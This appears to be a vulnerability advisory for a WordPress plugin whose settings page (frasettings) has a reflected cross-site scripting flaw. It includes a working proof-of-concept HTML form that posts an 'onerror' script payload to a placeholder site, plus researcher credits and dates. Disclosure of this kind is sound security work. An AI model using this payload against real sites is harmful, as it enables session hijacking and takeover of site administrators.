The plugin does not sanitize and escape some parameters from its setting page before outputting them back to the user, leading to a Reflected Cross-Site Scripting issue.
<html> <body> <form action="http://vulnerable-site.tld/wp-admin/admin.php?page=frasettings" method="POST"> <input type="hidden" name="findstr" value="Doing XSS Test here" /> <input type="hidden" name="replacestr" value="tested"/><img src=x onerror=alert(document.domain);//"> <input type="hidden" name="submit" value="Replace Now" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Vinay Varma Mudunuri
Yes
2022-11-03 (about 4 months ago)
2022-11-03 (about 4 months ago)
2022-11-03 (about 4 months ago)